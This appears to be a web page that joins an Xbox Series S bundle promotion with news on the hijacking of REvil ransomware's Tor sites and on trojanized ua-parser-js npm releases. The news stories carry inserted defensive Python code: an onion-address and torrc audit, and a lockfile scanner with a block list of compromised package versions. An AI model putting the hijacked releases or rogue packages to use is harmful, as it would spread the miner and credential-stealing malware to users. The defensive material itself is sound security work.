Best Buy has a really incredible deal on the Xbox Series S right now. You can pick it up for $249.99, which is $50 off. But that’s not really the deal here though. This is the Gilded Hunter Bundle, which does have in-game cosmetics and virtual currency for Fortnite, Rocket League and Fall Guys. All of which you can download onto the Xbox Series S with just the click of a button.

Xbox Series S Gilded Hunter Bundle – Best Buy

Why you should buy the Xbox Series S

The Series S is the cheaper Xbox on this console run, which isn’t a bad thing actually. It’s an all-digital model, which means that you will need to download all of your games onto this console. So the 512GB of storage may not go as far as you initially thought. But Xbox does make it pretty easy to add some more storage to your console.

What’s great about the Xbox Series S is, that you can use Game Pass on here. That’s going to give you instant access to hundreds if not thousands of games, for a low monthly subscription. Giving you a whole library of games, without spending hundreds of dollars all at once.

Small size and affordable price. The Xbox Series S is the smallest and most affordable Xbox console ever made. It measures just 6.5 x 15.1 x 27.5 cm and weighs only 1.93 kg, making it easy to fit into even a small space. It is also the most affordable next-generation console, starting at $299.

Fast loading times. The Xbox Series S has a custom NVMe SSD that provides significantly faster loading times than previous Xbox consoles. This means you can get into the action faster and spend less time waiting for games to load.

Support for 120fps gameplay. The Xbox Series S supports 120fps gameplay with games that support it. This means you can experience smoother and more responsive gameplay, especially in fast-paced games.

Upscaling to 4K resolution. The Xbox Series S can upscale games that are not natively 4K to 4K resolution. This means you can still enjoy games in a high-definition image, even if you don’t have a 4K TV.

Support for Dolby Atmos and Dolby Vision. The Xbox Series S supports Dolby Atmos and Dolby Vision HDR, which provide immersive audio and visual experiences.

Backward compatibility. The Xbox Series S is backward compatible with all Xbox One games, so you can play your old games on your new console.

You can buy the Xbox Series S Gilded Hunter Bundle from Best Buy today at the link below.

Xbox Series S Gilded Hunter Bundle – Best Buy



REvil ransomware gang goes dark after its Tor sites are hacked


In July 2021, the REvil ransomware group vanished under mounting US pressure after the Kaseya attack. However, the group returned in September 2021, carrying out extortion-based DDoS attacks on ITSPs in the UK and Canada/America.

The infamous REvil ransomware group has abruptly announced that it is ending its activities. The group, which gained notoriety with high-profile ransomware attacks against Kaseya, JBS and Travelex, has reportedly decided to go underground after its Tor payment portal and data leak blog were hijacked.

The news of REvil’s shutdown was posted on a well-known criminal forum by a threat actor using the handle “0_neday”, believed to be associated with the gang, and was first reported by Dmitry Smilyanets of Recorded Future.


REvil Announces Shutdown

In the post announcing the closure, the group said its Tor services had been hijacked: whoever did it brought up their own copies of the services using the gang’s private keys, which they must have obtained from a previous backup. The server was described as “compromised,” and the operator stated in the post that “they were looking for me.”

“To be precise, they deleted the path to my hidden service in the torrc file [used for configuring the Tor service] and raised their own so that I would go there. I checked on others — this was not. Good luck everyone, I’m off,” REvil operator(s) noted in the post.
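The torrc manipulation the operator describes, as an added example that is not part of the original post and is not Tor Project code: a v3 onion address is derived entirely from the hidden service’s ed25519 public key, so whoever holds a copy of the key can raise the same .onion on any host. The only local checks an operator has are whether the torrc still declares the expected HiddenServiceDir entries and whether the key in each directory still derives the expected address. The key-file header layout follows Tor’s hs_ed25519_public_key format; the sample key bytes and torrc text are constructed for illustration.

```python
# Added example (not from the REvil post, and not Tor Project code): derive the
# v3 onion address from a hidden service's public key and audit a torrc for the
# kind of HiddenServiceDir tampering the operator describes. The key bytes and
# torrc text below are constructed for illustration.
import base64
import hashlib

# Tor writes hs_ed25519_public_key as a 32-byte tag, NUL-padded, followed by the key.
HS_PUBKEY_HEADER = b"== ed25519v1-public: type0 ==".ljust(32, b"\x00")
ONION_VERSION = b"\x03"


def onion_address_from_pubkey(pubkey: bytes) -> str:
    """Derive a v3 onion address from a 32-byte ed25519 public key.

    Layout per rend-spec-v3: base32(PUBKEY | CHECKSUM | VERSION) + ".onion",
    with CHECKSUM = SHA3-256(".onion checksum" | PUBKEY | VERSION)[:2].
    The same key therefore yields the same address on any host that holds it.
    """
    if len(pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + ONION_VERSION).digest()[:2]
    return base64.b32encode(pubkey + checksum + ONION_VERSION).decode("ascii").lower() + ".onion"


def pubkey_from_onion_address(address: str) -> bytes:
    """Recover the public key from a v3 onion address, rejecting a tampered address."""
    address = address.lower()
    if not address.endswith(".onion"):
        raise ValueError("not an .onion address")
    raw = base64.b32decode(address[: -len(".onion")].upper())
    if len(raw) != 35 or raw[34:35] != ONION_VERSION:
        raise ValueError("not a v3 onion address")
    pubkey = raw[:32]
    if onion_address_from_pubkey(pubkey) != address:
        raise ValueError("onion address checksum mismatch")
    return pubkey


def pubkey_from_hs_file(data: bytes) -> bytes:
    """Extract the key from the contents of a hs_ed25519_public_key file."""
    if len(data) != 64 or data[:32] != HS_PUBKEY_HEADER:
        raise ValueError("unexpected hs_ed25519_public_key layout")
    return data[32:]


def hidden_service_dirs(torrc_text: str) -> list:
    """Return the HiddenServiceDir paths declared in a torrc, in file order."""
    dirs = []
    for line in torrc_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "hiddenservicedir":
            dirs.append(parts[1].strip())
    return dirs


def audit_hidden_services(torrc_text: str, expected: dict, key_files: dict) -> list:
    """Compare a torrc and its key files with the services the operator expects.

    expected:  {HiddenServiceDir path: expected .onion address}
    key_files: {HiddenServiceDir path: bytes of that directory's hs_ed25519_public_key}
    Returns a list of findings; an empty list means nothing has changed.
    """
    findings = []
    declared = hidden_service_dirs(torrc_text)
    for hs_dir, address in expected.items():
        if hs_dir not in declared:
            findings.append(f"missing: {hs_dir} is no longer declared in torrc")
        elif hs_dir not in key_files:
            findings.append(f"missing: {hs_dir} has no hs_ed25519_public_key")
        else:
            derived = onion_address_from_pubkey(pubkey_from_hs_file(key_files[hs_dir]))
            if derived != address.lower():
                findings.append(f"key mismatch: {hs_dir} now serves {derived}")
    for hs_dir in declared:
        if hs_dir not in expected:
            findings.append(f"unexpected: {hs_dir} declared but not in the known set")
    return findings


if __name__ == "__main__":
    demo_key = bytes(range(32))  # constructed, not a real service key
    demo_addr = onion_address_from_pubkey(demo_key)
    tampered_torrc = "HiddenServiceDir /var/lib/tor/attacker/\nHiddenServicePort 80 127.0.0.1:80\n"
    print(audit_hidden_services(tampered_torrc, {"/var/lib/tor/blog/": demo_addr}, {}))
```

The audit only tells you what changed on the box you can still see; it cannot detect a second host serving the same address elsewhere, which is exactly why losing a backup of the key material is unrecoverable for a hidden service.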

As shown in the screenshot below, the operator published the post on XSS.IS, the infamous Russian-language hacker forum:

[Screenshot: the operator’s post on XSS.IS]

Who Hijacked REvil’s Tor Sites?

At the moment, there is no clarity about who could have hijacked REvil’s Tor sites. According to The Washington Post, the FBI had obtained the decryption key for the REvil gang’s Kaseya attack in July, but that did not lead to the gang being taken down.

There are rumours that the Tor sites were taken over by a former member of the REvil group known as UNKN (Unknown), who acted as the gang’s spokesperson but did not return with the group when it resurfaced in September 2021.

The malware research group vx-underground tweeted that only Unknown and the threat actor who posted REvil’s closure statement had access to the domain keys, and that the gang’s domain had recently been accessed with Unknown’s keys.


“Since there was no confirmation of the reason for his loss, we resumed work, thinking that he was dead. But since today, 17.10, at 12:00 Moscow time, someone brought up the hidden services of a landing and a blog with the same key as ours, my fears were confirmed,” the threat actor explained.

However, in a conversation with Hackread.com, Steve Moore, chief security strategist at Exabeam, said: “This latest disruption seems to be caused by insider fighting or a possible offensive takedown. It’s the final blow to REvil. The operator only mentions a ‘third party’; no attempt is made to identify them.

“Keep in mind these are organizations like any other, but with fewer rules. Based on the information shared, they lost control of their backups, which contained keys to take over their network. In an exciting twist, the adversary was seemingly taken down due to weak technology hygiene, a flaw generally exploited by them to extort money from their victims,” Moore added.




CISA warns of trojanized versions of JavaScript library’s NPM package


The warning comes days after three rogue packages, okhsa, klow and klown, discovered by DevSecOps firm Sonatype, were removed from the NPM repository.

On Friday, the US Cybersecurity and Infrastructure Security Agency (CISA) released an alert pointing to a GitHub Advisory Database entry for the incident. According to CISA, crypto-mining malware had been hidden in UAParser.js, a popular JavaScript NPM library.

The library is downloaded six to eight million times per week and is used by websites and applications to identify a visitor’s browser and operating system from the User-Agent string. NPM has been part of Microsoft-owned GitHub since 2020.

Three Rogue NPM Packages Discovered


Reportedly, three versions of UAParser.js (0.7.29, 0.8.0 and 1.0.0) were published with malicious code embedded after the attacker hijacked the maintainer’s NPM account.

Any device running one of these versions could give the attacker access to sensitive and confidential information on it, and even full control of the machine.

It is suspected that the malicious code was injected to install a crypto miner on the targeted system. The issue is fixed in versions 0.7.30, 0.8.1 and 1.0.1; anyone on an affected version should upgrade to the corresponding fixed release.
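To find the hijacked releases in a project, as an added example (not CISA’s, GitHub’s or the ua-parser-js project’s own code): the scanner below walks an npm package-lock.json, in both the lockfileVersion 1 nested layout and the v2/v3 flat “packages” map, and reports every occurrence of the three compromised ua-parser-js versions or of the rogue okhsa, klow and klown packages, together with the fixed release to move to. The npm package name is ua-parser-js; the lockfile contents are constructed for illustration.

```python
# Added example (not CISA's, GitHub's or the ua-parser-js project's own code):
# scan an npm package-lock.json for the hijacked ua-parser-js releases and the
# three rogue packages named in the article. All lockfile data here is constructed.
import json

# Versions named in the advisory text; None means every version of the package is malicious.
COMPROMISED = {
    "ua-parser-js": {"0.7.29", "0.8.0", "1.0.0"},
    "okhsa": None,
    "klow": None,
    "klown": None,
}

# Fixed release for each affected ua-parser-js minor line.
FIXED_UA_PARSER = {"0.7": "0.7.30", "0.8": "0.8.1", "1.0": "1.0.1"}


def iter_lock_packages(lock: dict):
    """Yield (name, version) for every installed package in a package-lock.json.

    lockfileVersion 2/3 files carry a flat "packages" map keyed by the
    node_modules path; lockfileVersion 1 files nest dependencies as a tree.
    A v2 file also carries the legacy "dependencies" tree, which is skipped
    to avoid double counting.
    """
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project entry
                continue
            # "node_modules/foo/node_modules/@scope/bar" -> "@scope/bar"
            name = path.rsplit("node_modules/", 1)[-1]
            yield name, meta.get("version")
        return

    def walk(deps):
        for name, meta in deps.items():
            yield name, meta.get("version")
            yield from walk(meta.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def fixed_version(name: str, version: str):
    """Return the patched release to upgrade to, or None if there is no safe version."""
    if name != "ua-parser-js" or version is None:
        return None
    return FIXED_UA_PARSER.get(version.rsplit(".", 1)[0])


def find_compromised(lock: dict) -> list:
    """Return sorted (name, version) pairs in the lockfile that are on the blocklist."""
    hits = set()
    for name, version in iter_lock_packages(lock):
        if name not in COMPROMISED:
            continue
        bad_versions = COMPROMISED[name]
        if bad_versions is None or version in bad_versions:
            hits.add((name, version))
    return sorted(hits)


def scan_lockfile_text(text: str) -> list:
    """Parse package-lock.json text and report findings with remediation."""
    return [
        {"package": name, "version": version, "fixed": fixed_version(name, version)}
        for name, version in find_compromised(json.loads(text))
    ]


if __name__ == "__main__":
    # Constructed lockfileVersion 2 file with one hijacked release pulled in
    # transitively; a real scan reads package-lock.json from the project root.
    sample = json.dumps({
        "lockfileVersion": 2,
        "packages": {
            "": {"name": "demo-app"},
            "node_modules/express": {"version": "4.17.1"},
            "node_modules/express/node_modules/ua-parser-js": {"version": "0.7.29"},
        },
        "dependencies": {"express": {"version": "4.17.1"}},
    })
    for finding in scan_lockfile_text(sample):
        print(finding)
```

A clean scan of the lockfile is not the end of the job: the hijacked versions were live on the registry for hours, so any machine that ran an install in that window should be treated as GitHub’s advisory describes, regardless of what the lockfile says now.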

Developer’s Response

UAParser.js is developed and maintained by Indonesian programmer Faisal Salman, who publishes his software under the alias faisalman. Salman posted on his Gitmemory profile that his software had been modified and embedded with malicious code.

“I believe someone was hijacking my NPM account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware,” Salman said.

GitHub Alert

In an independent alert, GitHub notified users that any computer running this package should be considered fully compromised, and that all secrets and keys stored on it should be rotated immediately from a different computer.

“The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it,” the notice read.


